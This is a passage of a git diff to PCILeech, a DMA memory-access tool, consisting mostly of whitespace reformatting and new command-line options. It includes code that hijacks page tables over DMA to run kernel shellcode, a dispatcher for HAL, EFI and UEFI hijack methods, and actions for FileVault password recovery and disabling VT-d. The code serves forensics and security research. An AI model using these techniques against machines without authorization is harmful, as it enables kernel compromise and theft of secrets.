+    DeviceWriteDMA(ctx, h1.qwPTEAddrPhys, (PBYTE)&h1.qwPTE, sizeof(QWORD), 0);
+    //------------------------------------------------
+    // 5: wait for patch to reveive execution.
+    //------------------------------------------------
+    printf("KMD: Page Table hijacked - Waiting to receive execution.\n");
+    pdwPhysicalAddress = (PDWORD)(h2.pbLatest + h2.dwPageOffset + STAGE2_OFFSET_STAGE3_PHYSADDR);
+    do {
+        Sleep(100);
+        if(!DeviceReadDMA(ctx, h2.qwPageAddr, h2.pbLatest, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+            printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
+            return FALSE;
+        }
+    } while(!*pdwPhysicalAddress);
+    printf("KMD: Execution received - continuing ...\n");
+    //------------------------------------------------
+    // 6: Restore hijacked memory pages.
+    //------------------------------------------------
+    DeviceWriteDMA(ctx, h1.qwPTEAddrPhys, (PBYTE)&h1.qwPTEOrig, sizeof(QWORD), 0);
+    DeviceWriteDMA(ctx, h2.qwPTEAddrPhys, (PBYTE)&h2.qwPTEOrig, sizeof(QWORD), 0);
+    Sleep(100);
+    DeviceWriteDMA(ctx, h1.qwPageAddr, h1.pbOrig, 4096, 0);
+    DeviceWriteDMA(ctx, h2.qwPageAddr, h2.pbOrig, 4096, 0);
+    //------------------------------------------------
+    // 7: Set up kernel module shellcode (stage3) and finish.
+    //------------------------------------------------
+    return KMD_SetupStage3(ctx, *pdwPhysicalAddress, pSignature->chunk[4].pb, 4096);
 }
 
 BOOL KMD_SetupStage3_FromPartial(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	BYTE pb[4096];
-	DWORD cb;
-	if(ctx->pk->OperatingSystem == KMDDATA_OPERATING_SYSTEM_LINUX) {
-		return 
-			Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE3", pb, 4096, &cb) &&
-			KMD_SetupStage3(ctx, ctx->phKMD->dwPageAddr32, pb, 4096);
-	} else {
-		printf("KMD: Failed. Not a valid KMD @ address: 0x%08x\n", ctx->phKMD->dwPageAddr32);
-		return FALSE;
-	}
+    BYTE pb[4096];
+    DWORD cb;
+    if(ctx->pk->OperatingSystem == KMDDATA_OPERATING_SYSTEM_LINUX) {
+        return
+            Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE3", pb, 4096, &cb) &&
+            KMD_SetupStage3(ctx, ctx->phKMD->dwPageAddr32, pb, 4096);
+    } else {
+        printf("KMD: Failed. Not a valid KMD @ address: 0x%08x\n", ctx->phKMD->dwPageAddr32);
+        return FALSE;
+    }
 }
 
 BOOL KMDOpen_LoadExisting(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	//------------------------------------------------
-	// 1: Set up handle to existing shellcode
-	//------------------------------------------------
-	ctx->phKMD = (PKMDHANDLE)LocalAlloc(LMEM_ZEROINIT, sizeof(KMDHANDLE));
-	if(!ctx->phKMD) { return FALSE; }
-	ctx->phKMD->dwPageAddr32 = (DWORD)ctx->cfg->qwKMD;
-	ctx->pk = ctx->phKMD->pk = (PKMDDATA)ctx->phKMD->pbPageData;
-	if(!DeviceReadDMA(ctx, ctx->phKMD->dwPageAddr32, ctx->phKMD->pbPageData, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-		printf("KMD: Failed. Read failed @ address: 0x%08x\n", ctx->phKMD->dwPageAddr32);
-		goto fail;
-	}
-	if(ctx->phKMD->pk->MAGIC == KMDDATA_MAGIC_PARTIAL) {
-		return KMD_SetupStage3_FromPartial(ctx);
-	}
-	if(ctx->phKMD->pk->MAGIC != KMDDATA_MAGIC) {
-		printf("KMD: Failed. Not a valid KMD @ address: 0x%08x\n", ctx->phKMD->dwPageAddr32);
-		goto fail;
-	}
-	//------------------------------------------------ 
-	// 2: Retrieve physical memory range map and complete open action.
-	//------------------------------------------------
-	if(!KMD_GetPhysicalMemoryMap(ctx)) {
-		printf("KMD: Failed. Failed to retrieve physical memory map.\n");
-		goto fail;
-	}
-	return TRUE;
+    //------------------------------------------------
+    // 1: Set up handle to existing shellcode
+    //------------------------------------------------
+    ctx->phKMD = (PKMDHANDLE)LocalAlloc(LMEM_ZEROINIT, sizeof(KMDHANDLE));
+    if(!ctx->phKMD) { return FALSE; }
+    ctx->phKMD->dwPageAddr32 = (DWORD)ctx->cfg->qwKMD;
+    ctx->pk = ctx->phKMD->pk = (PKMDDATA)ctx->phKMD->pbPageData;
+    if(!DeviceReadDMA(ctx, ctx->phKMD->dwPageAddr32, ctx->phKMD->pbPageData, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+        printf("KMD: Failed. Read failed @ address: 0x%08x\n", ctx->phKMD->dwPageAddr32);
+        goto fail;
+    }
+    if(ctx->phKMD->pk->MAGIC == KMDDATA_MAGIC_PARTIAL) {
+        return KMD_SetupStage3_FromPartial(ctx);
+    }
+    if(ctx->phKMD->pk->MAGIC != KMDDATA_MAGIC) {
+        printf("KMD: Failed. Not a valid KMD @ address: 0x%08x\n", ctx->phKMD->dwPageAddr32);
+        goto fail;
+    }
+    //------------------------------------------------
+    // 2: Retrieve physical memory range map and complete open action.
+    //------------------------------------------------
+    if(!KMD_GetPhysicalMemoryMap(ctx)) {
+        printf("KMD: Failed. Failed to retrieve physical memory map.\n");
+        goto fail;
+    }
+    return TRUE;
 fail:
-	KMDClose(ctx);
-	return FALSE;
+    KMDClose(ctx);
+    return FALSE;
 }
 
 BOOL KMDOpen(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	if(ctx->cfg->qwKMD) {
-		return KMDOpen_LoadExisting(ctx);
-	} else if(ctx->cfg->qwCR3 || ctx->cfg->fPageTableScan) {
-		return KMDOpen_PageTableHijack(ctx);
-	} else if(0 == _stricmp(ctx->cfg->szKMDName, "WIN10_X64")) {
-		return KMDOpen_HalHijack(ctx);
-	} else if(0 == _stricmp(ctx->cfg->szKMDName, "LINUX_X64_EFI")) {
-		return KMDOpen_LinuxEfiRuntimeServicesHijack(ctx);
-	} else if(0 == _stricmp(ctx->cfg->szKMDName, "UEFI_EXIT_BOOT_SERVICES")) {
-		return KMDOpen_UEFI(ctx, 0xe8 /* ExitBootServices */);
-	} else if(0 == _stricmp(ctx->cfg->szKMDName, "UEFI_SIGNAL_EVENT")) {
-		return KMDOpen_UEFI(ctx, 0x68 /* ??? */);
-	} else {
-		return KMDOpen_MemoryScan(ctx);
-	}
+    if(ctx->cfg->qwKMD) {
+        return KMDOpen_LoadExisting(ctx);
+    } else if(ctx->cfg->qwCR3 || ctx->cfg->fPageTableScan) {
+        return KMDOpen_PageTableHijack(ctx);
+    } else if(0 == _stricmp(ctx->cfg->szKMDName, "WIN10_X64")) {
+        return KMDOpen_HalHijack(ctx);
+    } else if(0 == _stricmp(ctx->cfg->szKMDName, "LINUX_X64_EFI")) {
+        return KMDOpen_LinuxEfiRuntimeServicesHijack(ctx);
+    } else if(0 == _stricmp(ctx->cfg->szKMDName, "UEFI_EXIT_BOOT_SERVICES")) {
+        return KMDOpen_UEFI(ctx, 0xe8 /* ExitBootServices */);
+    } else if(0 == _stricmp(ctx->cfg->szKMDName, "UEFI_SIGNAL_EVENT")) {
+        return KMDOpen_UEFI(ctx, 0x68 /* ??? */);
+    } else {
+        return KMDOpen_MemoryScan(ctx);
+    }
 }
diff --git a/pcileech/oscompatibility.h b/pcileech/oscompatibility.h
index 8a5ae0d..5ba0805 100644
--- a/pcileech/oscompatibility.h
+++ b/pcileech/oscompatibility.h
@@ -1,6 +1,6 @@
 // oscompatibility.h : pcileech windows/linux/android compatibility layer.
 //
-// (c) Ulf Frisk, 2017
+// (c) Ulf Frisk, 2017-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #ifndef __OSCOMPATIBILITY_H__
@@ -87,6 +87,7 @@ typedef uint64_t							SIZE_T, *PSIZE_T;
 #define WINUSB_INTERFACE_HANDLE				libusb_device_handle*
 #define PIPE_TRANSFER_TIMEOUT				0x03
 #define CONSOLE_SCREEN_BUFFER_INFO			PVOID	// TODO: remove this dummy
+#define CRITICAL_SECTION					HANDLE
 
 #define _In_
 #define _Out_
@@ -95,7 +96,10 @@ typedef uint64_t							SIZE_T, *PSIZE_T;
 #define _In_opt_
 #define _Out_opt_
 #define __bcount(x)
+#define _Inout_bytecount_(x)
 #define _Inout_updates_bytes_(x)
+#define _Success_(return)
+
 
 #define max(a, b)							(((a) > (b)) ? (a) : (b))
 #define min(a, b)		 					(((a) < (b)) ? (a) : (b))
@@ -116,7 +120,13 @@ typedef uint64_t							SIZE_T, *PSIZE_T;
 #define ZeroMemory(pb, cb)					(memset(pb, 0, cb))
 #define WinUsb_SetPipePolicy(h, p, t, cb, pb)	// TODO: implement this for better USB2 performance.
 #define CloseHandle(h)							// TODO: remove this dummy implementation & replace with WARN.
-#define SetEvent(h)								// TODO: remove this dummy implementation!
+#define _ftelli64(f)						(ftello(f))
+#define _fseeki64(f, o, w)					(fseeko(f, o, w))
+
+#define InitializeCriticalSection(x)		// no dma transfer critical section in linux yet
+#define DeleteCriticalSection(x)			// no dma transfer critical section in linux yet
+#define EnterCriticalSection(x)				// no dma transfer critical section in linux yet
+#define LeaveCriticalSection(x)				// no dma transfer critical section in linux yet
 
 typedef struct _SYSTEMTIME {
 	WORD wYear;
diff --git a/pcileech/pcileech.c b/pcileech/pcileech.c
index b0a26ec..7fcd798 100644
--- a/pcileech/pcileech.c
+++ b/pcileech/pcileech.c
@@ -1,6 +1,6 @@
 // pcileech.c : implementation of core pcileech functionality.
 //
-// (c) Ulf Frisk, 2016, 2017
+// (c) Ulf Frisk, 2016-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #include "pcileech.h"
@@ -14,303 +14,318 @@
 #include "util.h"
 #include "kmd.h"
 #include "vfs.h"
+#include "vmm.h"
+#include "vmmproc.h"
 
 BOOL PCILeechConfigIntialize(_In_ DWORD argc, _In_ char* argv[], _Inout_ PPCILEECH_CONTEXT ctx)
 {
-	struct ACTION {
-		ACTION_TYPE tp;
-		LPSTR sz;
-	} ACTION;
-	const struct ACTION ACTIONS[] = {
-		{.tp = INFO,.sz = "info"},
-		{.tp = DUMP,.sz = "dump" },
-		{.tp = WRITE,.sz = "write" },
-		{.tp = PATCH,.sz = "patch" },
-		{.tp = SEARCH,.sz = "search" },
-		{.tp = KMDLOAD,.sz = "kmdload" },
-		{.tp = KMDEXIT,.sz = "kmdexit" },
-		{.tp = USB3380_FLASH,.sz = "flash" },
-		{.tp = MOUNT,.sz = "mount" },
-		{.tp = USB3380_START8051,.sz = "8051start" },
-		{.tp = USB3380_STOP8051,.sz = "8051stop" },
-		{.tp = DISPLAY,.sz = "display" },
-		{.tp = PAGEDISPLAY,.sz = "pagedisplay" },
-		{.tp = TESTMEMREAD,.sz = "testmemread" },
-		{.tp = TESTMEMREADWRITE,.sz = "testmemreadwrite" },
-		{.tp = MAC_FVRECOVER,.sz = "mac_fvrecover" },
-		{.tp = MAC_FVRECOVER2,.sz = "mac_fvrecover2" },
-		{.tp = MAC_DISABLE_VTD,.sz = "mac_disablevtd" },
-		{.tp = PT_PHYS2VIRT,.sz = "pt_phys2virt" },
-		{.tp = TLP,.sz = "tlp" },
-		{.tp = PROBE,.sz = "probe" },
-	};
-	DWORD j, i = 1;
-	if(argc < 2) { return FALSE; }
-	// allocate memory for config struct
-	ctx->cfg = LocalAlloc(LMEM_ZEROINIT, sizeof(CONFIG));
-	if(!ctx->cfg) { return FALSE; }
-	// set defaults
-	ctx->cfg->tpAction = NA;
-	ctx->cfg->qwAddrMax = ~0;
-	ctx->cfg->fOutFile = TRUE;
-	ctx->cfg->qwMaxSizeDmaIo = ~0;
-	// fetch command line actions/options
-	loop:
-	while(i < argc) {
-		for(j = 0; j < sizeof(ACTIONS) / sizeof(ACTION); j++) { // parse command (if found)
-			if(0 == strcmp(argv[i], ACTIONS[j].sz)) {
-				ctx->cfg->tpAction = ACTIONS[j].tp;
-				i++;
-				goto loop;
-			}
-		}
-		if(ctx->cfg->tpAction == NA && 0 != memcmp(argv[i], "-", 1)) {
-			ctx->cfg->tpAction = EXEC;
-			strcpy_s(ctx->cfg->szShellcodeName, MAX_PATH, argv[i]);
-			i++;
-			continue;
-		}
-		// parse options (command not found)
-		if(0 == strcmp(argv[i], "-pt")) {
-			ctx->cfg->fPageTableScan = TRUE;
-			i++;
-			continue;
-		} else if(0 == strcmp(argv[i], "-all")) {
-			ctx->cfg->fPatchAll = TRUE;
-			i++;
-			continue;
-		} else if(0 == strcmp(argv[i], "-force")) {
-			ctx->cfg->fForceRW = TRUE;
-			i++;
-			continue;
-		} else if(0 == strcmp(argv[i], "-help")) {
-			ctx->cfg->fShowHelp = TRUE;
-			i++;
-			continue;
-		} else if(0 == _stricmp(argv[i], "-usb2")) {
-			ctx->cfg->fForceUsb2 = TRUE;
-			i++;
-			continue;
-		} else if((0 == _stricmp(argv[i], "-pcie_gen1")) || (0 == _stricmp(argv[i], "-pcie-gen1"))) {
-			ctx->cfg->fForcePCIeGen1 = TRUE;
-			i++;
-			continue;
-		} else if(0 == _stricmp(argv[i], "-v")) {
-			ctx->cfg->fVerbose = TRUE;
-			i++;
-			continue;
-		} else if(0 == _stricmp(argv[i], "-vv")) {
-			ctx->cfg->fVerbose = TRUE;
-			ctx->cfg->fVerboseExtra = TRUE;
-			i++;
-			continue;
-		} else if(i + 1 >= argc) {
-			return FALSE;
-		} else if(0 == strcmp(argv[i], "-min")) {
-			ctx->cfg->qwAddrMin = Util_GetNumeric(argv[i + 1]);
-		} else if(0 == strcmp(argv[i], "-max")) {
-			ctx->cfg->qwAddrMax = Util_GetNumeric(argv[i + 1]);
-		} else if(0 == strcmp(argv[i], "-cr3")) {
-			ctx->cfg->qwCR3 = Util_GetNumeric(argv[i + 1]);
-		}else if(0 == strcmp(argv[i], "-efibase")) {
-			ctx->cfg->qwEFI_IBI_SYST = Util_GetNumeric(argv[i + 1]);
-		} else if(0 == strcmp(argv[i], "-iosize")) {
-			ctx->cfg->qwMaxSizeDmaIo = Util_GetNumeric(argv[i + 1]);
-			ctx->cfg->qwMaxSizeDmaIo = ~0xfff & max(0x1000, ctx->cfg->qwMaxSizeDmaIo);
-		} else if(0 == strcmp(argv[i], "-tlpwait")) {
-			ctx->cfg->dwListenTlpTimeMs = (DWORD)(1000 * Util_GetNumeric(argv[i + 1]));
-		} else if(0 == strcmp(argv[i], "-device")) {
-			ctx->cfg->dev.tp = PCILEECH_DEVICE_NA;
-			if(0 == _stricmp(argv[i + 1], "usb3380")) { 
-				ctx->cfg->dev.tp = PCILEECH_DEVICE_USB3380;
-			} else if(0 == _stricmp(argv[i + 1], "fpga")) {
-				ctx->cfg->dev.tp = PCILEECH_DEVICE_FPGA;
-			} else if(0 == _stricmp(argv[i + 1], "sp605_tcp")) {
-				ctx->cfg->dev.tp = PCILEECH_DEVICE_SP605_TCP;
-			}
-		} else if(0 == strcmp(argv[i], "-device-addr")) {
-			ctx->cfg->TcpAddr = inet_addr(argv[i + 1]);
-		} else if(0 == strcmp(argv[i], "-device-port")) {
-			ctx->cfg->TcpPort = atoi(argv[i + 1]);
-		} else if(0 == strcmp(argv[i], "-out")) {
-			if((0 == _stricmp(argv[i + 1], "none")) || (0 == _stricmp(argv[i + 1], "null"))) {
-				ctx->cfg->fOutFile = FALSE;
-			} else {
-				strcpy_s(ctx->cfg->szFileOut, MAX_PATH, argv[i + 1]);
-			}
-		} else if(0 == strcmp(argv[i], "-in")) {
-			ctx->cfg->cbIn = max(0x40000, 0x1000 + Util_GetFileSize(argv[i + 1]));
-			ctx->cfg->pbIn = LocalAlloc(LMEM_ZEROINIT, ctx->cfg->cbIn);
-			if(!ctx->cfg->pbIn) { return FALSE; }
-			if(!Util_ParseHexFileBuiltin(argv[i + 1], ctx->cfg->pbIn, (DWORD)ctx->cfg->cbIn, (PDWORD)&ctx->cfg->cbIn)) { return FALSE; }
-		} else if(0 == strcmp(argv[i], "-s")) {
-			strcpy_s(ctx->cfg->szInS, MAX_PATH, argv[i + 1]);
-		} else if(0 == strcmp(argv[i], "-sig")) {
-			strcpy_s(ctx->cfg->szSignatureName, MAX_PATH, argv[i + 1]);
-		} else if(0 == strcmp(argv[i], "-kmd")) {
-			ctx->cfg->qwKMD = strtoull(argv[i + 1], NULL, 16);
-			if(ctx->cfg->qwKMD < 0x1000) {
-				strcpy_s(ctx->cfg->szKMDName, MAX_PATH, argv[i + 1]);
-			} else {
-				ctx->cfg->fAddrKMDSetByArgument = TRUE;
-			}
-		} else if(2 == strlen(argv[i]) && '0' <= argv[i][1] && '9' >= argv[i][1]) { // -0..9 param
-			ctx->cfg->qwDataIn[argv[i][1] - '0'] = Util_GetNumeric(argv[i + 1]);
-		} else if(!memcmp(argv[i], "-device-opt", 11) && (argv[i][11] >= '0') && (argv[i][11] <= '3')) { // -devopt[0-3] (device options)
-			ctx->cfg->DeviceOpt[argv[i][11] - '0'].qwValue = Util_GetNumeric(argv[i + 1]);
-			ctx->cfg->DeviceOpt[argv[i][11] - '0'].isValid = TRUE;
-		}
-		i += 2;
-	}
-	if(!ctx->cfg->pbIn) {
-		ctx->cfg->pbIn = LocalAlloc(LMEM_ZEROINIT, 0x40000);
-	}
-	// try correct erroneous options, if needed
-	if(ctx->cfg->tpAction == NA) {
-		return FALSE;
-	}
-	return TRUE;
+    struct ACTION {
+        ACTION_TYPE tp;
+        LPSTR sz;
+    } ACTION;
+    const struct ACTION ACTIONS[] = {
+        {.tp = INFO,.sz = "info"},
+        {.tp = DUMP,.sz = "dump" },
+        {.tp = WRITE,.sz = "write" },
+        {.tp = PATCH,.sz = "patch" },
+        {.tp = SEARCH,.sz = "search" },
+        {.tp = KMDLOAD,.sz = "kmdload" },
+        {.tp = KMDEXIT,.sz = "kmdexit" },
+        {.tp = USB3380_FLASH,.sz = "flash" },
+        {.tp = MOUNT,.sz = "mount" },
+        {.tp = USB3380_START8051,.sz = "8051start" },
+        {.tp = USB3380_STOP8051,.sz = "8051stop" },
+        {.tp = DISPLAY,.sz = "display" },
+        {.tp = PAGEDISPLAY,.sz = "pagedisplay" },
+        {.tp = TESTMEMREAD,.sz = "testmemread" },
+        {.tp = TESTMEMREADWRITE,.sz = "testmemreadwrite" },
+        {.tp = MAC_FVRECOVER,.sz = "mac_fvrecover" },
+        {.tp = MAC_FVRECOVER2,.sz = "mac_fvrecover2" },
+        {.tp = MAC_DISABLE_VTD,.sz = "mac_disablevtd" },
+        {.tp = PT_PHYS2VIRT,.sz = "pt_phys2virt" },
+        {.tp = PT_VIRT2PHYS,.sz = "pt_virt2phys" },
+        {.tp = TLP,.sz = "tlp" },
+        {.tp = PROBE,.sz = "probe" },
+        {.tp = IDENTIFY,.sz = "identify" },
+    };
+    DWORD j, i = 1;
+    if(argc < 2) { return FALSE; }
+    // allocate memory for config struct
+    ctx->cfg = LocalAlloc(LMEM_ZEROINIT, sizeof(CONFIG));
+    if(!ctx->cfg) { return FALSE; }
+    // set defaults
+    ctx->cfg->tpAction = NA;
+    ctx->cfg->qwAddrMax = ~0;
+    ctx->cfg->fOutFile = TRUE;
+    ctx->cfg->qwMaxSizeDmaIo = ~0;
+    // fetch command line actions/options
+    loop:
+    while(i < argc) {
+        for(j = 0; j < sizeof(ACTIONS) / sizeof(ACTION); j++) { // parse command (if found)
+            if(0 == strcmp(argv[i], ACTIONS[j].sz)) {
+                ctx->cfg->tpAction = ACTIONS[j].tp;
+                i++;
+                goto loop;
+            }
+        }
+        if(ctx->cfg->tpAction == NA && 0 != memcmp(argv[i], "-", 1)) {
+            ctx->cfg->tpAction = EXEC;
+            strcpy_s(ctx->cfg->szShellcodeName, MAX_PATH, argv[i]);
+            i++;
+            continue;
+        }
+        // parse options (command not found)
+        if(0 == strcmp(argv[i], "-pt")) {
+            ctx->cfg->fPageTableScan = TRUE;
+            i++;
+            continue;
+        } else if(0 == strcmp(argv[i], "-all")) {
+            ctx->cfg->fPatchAll = TRUE;
+            i++;
+            continue;
+        } else if(0 == strcmp(argv[i], "-force")) {
+            ctx->cfg->fForceRW = TRUE;
+            i++;
+            continue;
+        } else if(0 == strcmp(argv[i], "-help")) {
+            ctx->cfg->fShowHelp = TRUE;
+            i++;
+            continue;
+        } else if(0 == _stricmp(argv[i], "-usb2")) {
+            ctx->cfg->fForceUsb2 = TRUE;
+            i++;
+            continue;
+        } else if((0 == _stricmp(argv[i], "-pcie_gen1")) || (0 == _stricmp(argv[i], "-pcie-gen1"))) {
+            ctx->cfg->fForcePCIeGen1 = TRUE;
+            i++;
+            continue;
+        } else if(0 == _stricmp(argv[i], "-v")) {
+            ctx->cfg->fVerbose = TRUE;
+            i++;
+            continue;
+        } else if(0 == _stricmp(argv[i], "-vv")) {
+            ctx->cfg->fVerboseExtra = TRUE;
+            i++;
+            continue;
+        } else if(0 == _stricmp(argv[i], "-vvv")) {
+            ctx->cfg->fVerboseExtraTlp = TRUE;
+            i++;
+            continue;
+        } else if(i + 1 >= argc) {
+            return FALSE;
+        } else if(0 == strcmp(argv[i], "-min")) {
+            ctx->cfg->qwAddrMin = Util_GetNumeric(argv[i + 1]);
+        } else if(0 == strcmp(argv[i], "-max")) {
+            ctx->cfg->qwAddrMax = Util_GetNumeric(argv[i + 1]);
+        } else if(0 == strcmp(argv[i], "-cr3")) {
+            ctx->cfg->qwCR3 = Util_GetNumeric(argv[i + 1]);
+        }else if(0 == strcmp(argv[i], "-efibase")) {
+            ctx->cfg->qwEFI_IBI_SYST = Util_GetNumeric(argv[i + 1]);
+        } else if(0 == strcmp(argv[i], "-iosize")) {
+            ctx->cfg->qwMaxSizeDmaIo = Util_GetNumeric(argv[i + 1]);
+            ctx->cfg->qwMaxSizeDmaIo = ~0xfff & max(0x1000, ctx->cfg->qwMaxSizeDmaIo);
+        } else if(0 == strcmp(argv[i], "-tlpwait")) {
+            ctx->cfg->dwListenTlpTimeMs = (DWORD)(1000 * Util_GetNumeric(argv[i + 1]));
+        } else if(0 == strcmp(argv[i], "-device")) {
+            ctx->cfg->dev.tp = PCILEECH_DEVICE_NA;
+            if(0 == _stricmp(argv[i + 1], "usb3380")) {
+                ctx->cfg->dev.tp = PCILEECH_DEVICE_USB3380;
+            } else if(0 == _stricmp(argv[i + 1], "fpga")) {
+                ctx->cfg->dev.tp = PCILEECH_DEVICE_FPGA;
+            } else if(0 == _stricmp(argv[i + 1], "sp605_tcp")) {
+                ctx->cfg->dev.tp = PCILEECH_DEVICE_SP605_TCP;
+            } else if((Util_GetFileSize(argv[i + 1]) >= 0x1000)) {
+                strcpy_s(ctx->cfg->dev.szFileNameOptTpFile, MAX_PATH, argv[i + 1]);
+                ctx->cfg->dev.tp = PCILEECH_DEVICE_FILE;
+            }
+        } else if(0 == strcmp(argv[i], "-device-addr")) {
+            ctx->cfg->TcpAddr = inet_addr(argv[i + 1]);
+        } else if(0 == strcmp(argv[i], "-device-port")) {
+            ctx->cfg->TcpPort = atoi(argv[i + 1]);
+        } else if(0 == strcmp(argv[i], "-out")) {
+            if((0 == _stricmp(argv[i + 1], "none")) || (0 == _stricmp(argv[i + 1], "null"))) {
+                ctx->cfg->fOutFile = FALSE;
+            } else {
+                strcpy_s(ctx->cfg->szFileOut, MAX_PATH, argv[i + 1]);
+            }
+        } else if(0 == strcmp(argv[i], "-in")) {
+            ctx->cfg->cbIn = max(0x40000, 0x1000 + Util_GetFileSize(argv[i + 1]));
+            ctx->cfg->pbIn = LocalAlloc(LMEM_ZEROINIT, ctx->cfg->cbIn);
+            if(!ctx->cfg->pbIn) { return FALSE; }
+            if(!Util_ParseHexFileBuiltin(argv[i + 1], ctx->cfg->pbIn, (DWORD)ctx->cfg->cbIn, (PDWORD)&ctx->cfg->cbIn)) { return FALSE; }
+        } else if(0 == strcmp(argv[i], "-s")) {
+            strcpy_s(ctx->cfg->szInS, MAX_PATH, argv[i + 1]);
+        } else if(0 == strcmp(argv[i], "-sig")) {
+            strcpy_s(ctx->cfg->szSignatureName, MAX_PATH, argv[i + 1]);
+        } else if(0 == strcmp(argv[i], "-kmd")) {
+            ctx->cfg->qwKMD = strtoull(argv[i + 1], NULL, 16);
+            if(ctx->cfg->qwKMD < 0x1000) {
+                strcpy_s(ctx->cfg->szKMDName, MAX_PATH, argv[i + 1]);
+            } else {
+                ctx->cfg->fAddrKMDSetByArgument = TRUE;
+            }
+        } else if(2 == strlen(argv[i]) && '0' <= argv[i][1] && '9' >= argv[i][1]) { // -0..9 param
+            ctx->cfg->qwDataIn[argv[i][1] - '0'] = Util_GetNumeric(argv[i + 1]);
+        } else if(!memcmp(argv[i], "-device-opt", 11) && (argv[i][11] >= '0') && (argv[i][11] <= '3')) { // -devopt[0-3] (device options)
+            ctx->cfg->DeviceOpt[argv[i][11] - '0'].qwValue = Util_GetNumeric(argv[i + 1]);
+            ctx->cfg->DeviceOpt[argv[i][11] - '0'].isValid = TRUE;
+        }
+        i += 2;
+    }
+    if(!ctx->cfg->pbIn) {
+        ctx->cfg->pbIn = LocalAlloc(LMEM_ZEROINIT, 0x40000);
+    }
+    // try correct erroneous options, if needed
+    if(ctx->cfg->tpAction == NA) {
+        return FALSE;
+    }
+    return TRUE;
 }
 
 VOID PCILeechConfigFixup(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	QWORD qw;
-	// device specific configuration
-	ctx->cfg->qwMaxSizeDmaIo = min(ctx->cfg->qwMaxSizeDmaIo, ctx->cfg->dev.qwMaxSizeDmaIo);
-	// no kmd -> max address == max address that device support
-	if(!ctx->cfg->szKMDName[0] && !ctx->cfg->qwKMD) {
-		if(ctx->cfg->qwAddrMax == 0 || ctx->cfg->qwAddrMax > ctx->cfg->dev.qwAddrMaxNative) {
-			ctx->cfg->qwAddrMax = ctx->cfg->dev.qwAddrMaxNative;
-		}
-	}
-	// fixup addresses
-	if(ctx->cfg->qwAddrMin > ctx->cfg->qwAddrMax) {
-		qw = ctx->cfg->qwAddrMin;
-		ctx->cfg->qwAddrMin = ctx->cfg->qwAddrMax;
-		ctx->cfg->qwAddrMax = qw;
-	}
-	ctx->cfg->qwCR3 &= ~0xfff;
-	ctx->cfg->qwKMD &= ~0xfff;
+    QWORD qw;
+    // device specific configuration
+    ctx->cfg->qwMaxSizeDmaIo = min(ctx->cfg->qwMaxSizeDmaIo, ctx->cfg->dev.qwMaxSizeDmaIo);
+    // no kmd -> max address == max address that device support
+    if(!ctx->cfg->szKMDName[0] && !ctx->cfg->qwKMD) {
+        if(ctx->cfg->qwAddrMax == 0 || ctx->cfg->qwAddrMax > ctx->cfg->dev.qwAddrMaxNative) {
+            ctx->cfg->qwAddrMax = ctx->cfg->dev.qwAddrMaxNative;
+        }
+    }
+    // fixup addresses
+    if(ctx->cfg->qwAddrMin > ctx->cfg->qwAddrMax) {
+        qw = ctx->cfg->qwAddrMin;
+        ctx->cfg->qwAddrMin = ctx->cfg->qwAddrMax;
+        ctx->cfg->qwAddrMax = qw;
+    }
+    ctx->cfg->qwCR3 &= ~0xfff;
+    ctx->cfg->qwKMD &= ~0xfff;
 }
 
 VOID PCILeechFreeContext(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	if(!ctx) { return; }
-	KMDClose(ctx);
-	DeviceClose(ctx);
-	if(ctx->cfg) { 
-		if(ctx->cfg->pbIn) { LocalFree(ctx->cfg->pbIn); }
-		LocalFree(ctx->cfg); 
-	}
-	if(ctx) { LocalFree(ctx); }
+    if(!ctx) { return; }
+    VmmClose(ctx);
+    KMDClose(ctx);
+    DeviceClose(ctx);
+    if(ctx->cfg) {
+        if(ctx->cfg->pbIn) { LocalFree(ctx->cfg->pbIn); }
+        LocalFree(ctx->cfg);
+    }
+    if(ctx) { LocalFree(ctx); }
 }
 
 int main(_In_ int argc, _In_ char* argv[])
 {
-	BOOL result;
-	PKMDEXEC pKmdExec = NULL;
-	PPCILEECH_CONTEXT ctx;
-	printf("\n");
-	ctx = LocalAlloc(LMEM_ZEROINIT, sizeof(PCILEECH_CONTEXT));
-	if(!ctx) {
-		printf("PCILEECH: Out of memory.\n");
-		return 1;
-	}
+    BOOL result;
+    PKMDEXEC pKmdExec = NULL;
+    PPCILEECH_CONTEXT ctx;
+    printf("\n");
+    ctx = LocalAlloc(LMEM_ZEROINIT, sizeof(PCILEECH_CONTEXT));
+    if(!ctx) {
+        printf("PCILEECH: Out of memory.\n");
+        return 1;
+    }
     result = PCILeechConfigIntialize((DWORD)argc, argv, ctx);
-	if(!result) {
-		Help_ShowGeneral();
-		PCILeechFreeContext(ctx);
-		return 1;
-	}
-	if(ctx->cfg->tpAction == EXEC) {
-		result = Util_LoadKmdExecShellcode(ctx->cfg->szShellcodeName, &pKmdExec);
-		LocalFree(pKmdExec);
-		if(!result) {
-			Help_ShowGeneral();
-			PCILeechFreeContext(ctx);
-			return 1;
-		}
-	}
-	// actions that do not require a working initialized connection to a pcileech
-	// device to start executing the command are found below:
-	if(ctx->cfg->tpAction == INFO || ctx->cfg->tpAction == MAC_FVRECOVER2 || ctx->cfg->tpAction == MAC_DISABLE_VTD || ctx->cfg->fShowHelp) {
-		if(ctx->cfg->tpAction == INFO) {
-			Help_ShowInfo();
-		} else if(ctx->cfg->tpAction == MAC_FVRECOVER2) {
-			Action_MacFilevaultRecover(ctx, FALSE);
-		} else if(ctx->cfg->tpAction == MAC_DISABLE_VTD) {
-			Action_MacDisableVtd(ctx);
-		} else if(ctx->cfg->fShowHelp) {
-			Help_ShowDetailed(ctx->cfg);
-		}
-		PCILeechFreeContext(ctx);
-		return 0;
-	}
-	result = DeviceOpen(ctx);
-	if(!result) {
-		printf("PCILEECH: Failed to connect to the device.\n");
-		PCILeechFreeContext(ctx);
-		return 1;
-	}
-	PCILeechConfigFixup(ctx); // post device config adjustments
